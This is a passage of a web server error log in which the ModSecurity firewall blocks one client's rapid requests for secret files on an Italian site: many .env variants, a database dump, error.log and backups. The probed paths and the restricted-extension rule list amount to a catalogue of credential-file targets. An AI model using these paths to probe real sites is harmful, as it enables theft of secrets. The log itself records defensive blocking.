"aWEjhZnqcf3ij-c56sst-gAAAAM"]
[Fri Jan 09 16:49:25.515882 2026] [:error] [pid 1290988] [client 18.130.245.147:43402] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/db_backup.sql"] [unique_id "aWEjhZnqcf3ij-c56sst-gAAAAM"]
[Fri Jan 09 16:49:25.516021 2026] [:error] [pid 1290988] [client 18.130.245.147:43402] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/db_backup.sql"] [unique_id "aWEjhZnqcf3ij-c56sst-gAAAAM"]
[Fri Jan 09 16:49:25.620677 2026] [:error] [pid 1291018] [client 18.130.245.147:43420] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aWEjhfa-381C0T8V_x3aZQAAAAU"]
[Fri Jan 09 16:49:25.620870 2026] [:error] [pid 1291018] [client 18.130.245.147:43420] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aWEjhfa-381C0T8V_x3aZQAAAAU"]
[Fri Jan 09 16:49:25.621020 2026] [:error] [pid 1291018] [client 18.130.245.147:43420] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aWEjhfa-381C0T8V_x3aZQAAAAU"]
[Fri Jan 09 16:49:25.719520 2026] [:error] [pid 1290987] [client 18.130.245.147:43438] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env"] [unique_id "aWEjhZa6YpMWICkHe7jGWQAAAAI"]
[Fri Jan 09 16:49:25.719711 2026] [:error] [pid 1290987] [client 18.130.245.147:43438] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env"] [unique_id "aWEjhZa6YpMWICkHe7jGWQAAAAI"]
[Fri Jan 09 16:49:25.719871 2026] [:error] [pid 1290987] [client 18.130.245.147:43438] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env"] [unique_id "aWEjhZa6YpMWICkHe7jGWQAAAAI"]
[Fri Jan 09 16:49:25.818683 2026] [:error] [pid 1293937] [client 18.130.245.147:43468] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aWEjhS30tpu2Qs_7o9csDgAAAAY"]
[Fri Jan 09 16:49:25.818914 2026] [:error] [pid 1293937] [client 18.130.245.147:43468] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aWEjhS30tpu2Qs_7o9csDgAAAAY"]
[Fri Jan 09 16:49:25.819070 2026] [:error] [pid 1293937] [client 18.130.245.147:43468] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aWEjhS30tpu2Qs_7o9csDgAAAAY"]
[Fri Jan 09 16:49:25.913364 2026] [:error] [pid 1295009] [client 18.130.245.147:43488] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env"] [unique_id "aWEjhROQmYLXvoRWxa_UrwAAAAc"]
[Fri Jan 09 16:49:25.913559 2026] [:error] [pid 1295009] [client 18.130.245.147:43488] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env"] [unique_id "aWEjhROQmYLXvoRWxa_UrwAAAAc"]
[Fri Jan 09 16:49:25.913713 2026] [:error] [pid 1295009] [client 18.130.245.147:43488] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env"] [unique_id "aWEjhROQmYLXvoRWxa_UrwAAAAc"]
[Fri Jan 09 16:49:26.004860 2026] [:error] [pid 1295010] [client 18.130.245.147:43506] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aWEjhiTjpONdb2ogUxonswAAAAg"]
[Fri Jan 09 16:49:26.005159 2026] [:error] [pid 1295010] [client 18.130.245.147:43506] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aWEjhiTjpONdb2ogUxonswAAAAg"]
[Fri Jan 09 16:49:26.005306 2026] [:error] [pid 1295010] [client 18.130.245.147:43506] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aWEjhiTjpONdb2ogUxonswAAAAg"]
[Fri Jan 09 16:49:26.095926 2026] [:error] [pid 1290985] [client 18.130.245.147:43522] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aWEjhghnMz7Kl76N6_LzgQAAAAA"]
[Fri Jan 09 16:49:26.096121 2026] [:error] [pid 1290985] [client 18.130.245.147:43522] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aWEjhghnMz7Kl76N6_LzgQAAAAA"]
[Fri Jan 09 16:49:26.096271 2026] [:error] [pid 1290985] [client 18.130.245.147:43522] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aWEjhghnMz7Kl76N6_LzgQAAAAA"]
[Fri Jan 09 16:49:26.197692 2026] [:error] [pid 1290986] [client 18.130.245.147:43550] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aWEjhnvPx48oXeBpWHAqYQAAAAE"]
[Fri Jan 09 16:49:26.197879 2026] [:error] [pid 1290986] [client 18.130.245.147:43550] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aWEjhnvPx48oXeBpWHAqYQAAAAE"]
[Fri Jan 09 16:49:26.198032 2026] [:error] [pid 1290986] [client 18.130.245.147:43550] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aWEjhnvPx48oXeBpWHAqYQAAAAE"]
[Fri Jan 09 16:49:26.292787 2026] [:error] [pid 1290989] [client 18.130.245.147:43574] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aWEjhrwxb_CFGAx2PBFTCQAAAAQ"]
[Fri Jan 09 16:49:26.292975 2026] [:error] [pid 1290989] [client 18.130.245.147:43574] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aWEjhrwxb_CFGAx2PBFTCQAAAAQ"]
[Fri Jan 09 16:49:26.293125 2026] [:error] [pid 1290989] [client 18.130.245.147:43574] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aWEjhrwxb_CFGAx2PBFTCQAAAAQ"]
[Fri Jan 09 16:49:26.396537 2026] [:error] [pid 1290988] [client 18.130.245.147:43596] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aWEjhpnqcf3ij-c56sst-wAAAAM"]
[Fri Jan 09 16:49:26.396737 2026] [:error] [pid 1290988] [client 18.130.245.147:43596] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aWEjhpnqcf3ij-c56sst-wAAAAM"]
[Fri Jan 09 16:49:26.396892 2026] [:error] [pid 1290988] [client 18.130.245.147:43596] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aWEjhpnqcf3ij-c56sst-wAAAAM"]
[Fri Jan 09 16:49:27.279791 2026] [:error] [pid 1290988] [client 18.130.245.147:43792] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aWEjh5nqcf3ij-c56sst_AAAAAM"]
[Fri Jan 09 16:49:27.280009 2026] [:error] [pid 1290988] [client 18.130.245.147:43792] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aWEjh5nqcf3ij-c56sst_AAAAAM"]
[Fri Jan 09 16:49:27.280167 2026] [:error] [pid 1290988] [client 18.130.245.147:43792] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aWEjh5nqcf3ij-c56sst_AAAAAM"]
[Fri Jan 09 16:49:27.380077 2026] [:error] [pid 1291018] [client 18.130.245.147:43826] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aWEjh_a-381C0T8V_x3aZwAAAAU"]
[Fri Jan 09 16:49:27.380279 2026] [:error] [pid 1291018] [client 18.130.245.147:43826] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aWEjh_a-381C0T8V_x3aZwAAAAU"]
[Fri Jan 09 16:49:27.380435 2026] [:error] [pid 1291018] [client 18.130.245.147:43826] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aWEjh_a-381C0T8V_x3aZwAAAAU"]
[Fri Jan 09 16:49:27.476789 2026] [:error] [pid 1290987] [client 18.130.245.147:43840] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWEjh5a6YpMWICkHe7jGWwAAAAI"]
[Fri Jan 09 16:49:27.476938 2026] [:error] [pid 1290987] [client 18.130.245.147:43840] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWEjh5a6YpMWICkHe7jGWwAAAAI"]
[Fri Jan 09 16:49:27.477126 2026] [:error] [pid 1290987] [client 18.130.245.147:43840] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWEjh5a6YpMWICkHe7jGWwAAAAI"]
[Fri Jan 09 16:49:27.477281 2026] [:error] [pid 1290987] [client 18.130.245.147:43840] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWEjh5a6YpMWICkHe7jGWwAAAAI"]
